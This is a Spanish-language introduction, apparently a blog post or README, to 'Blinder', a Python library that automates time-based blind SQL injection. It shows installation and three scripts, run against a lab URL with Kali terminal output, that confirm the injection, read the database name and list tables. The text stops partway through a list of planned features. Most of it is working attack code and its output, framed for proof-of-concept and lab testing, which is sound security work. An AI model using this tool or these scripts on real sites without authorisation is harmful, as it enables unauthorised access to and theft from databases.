
Una librería de Python para automatizar la inyección SQL ciega basada en tiempo
Blidner es una pequeña biblioteca de Python para automatizar la inyección SQL ciega basada en tiempo mediante el uso de consultas predefinidas como funciones para automatizar el desarrollo rápido de PoC.
Puedes instalar Blinder usando el siguiente comando:
pip install blinder
O descargando el código fuente e importándolo manualmente a tu proyecto.
Para usar blinder necesitas importar el módulo Blinder y luego comenzar a usar las funciones principales de Blinder.
Puedes usar Blinder "con la versión actual" para hacer lo siguiente:
Puedes verificar la inyección en una URL usando el siguiente código:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print blind.check_injection()
El resultado de la ejecución será:
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#
Puedes obtener el nombre de la base de datos usando el siguiente código:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print "Database name is : %s " % blind.get_database()
Y los resultados serán:
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#
Para obtener los nombres de tablas puedes usar el siguiente código:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
tables = blind.get_tables()
for table in tables:
print table
Y los resultados serán:
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#
Muchas características deberían añadirse pronto, como: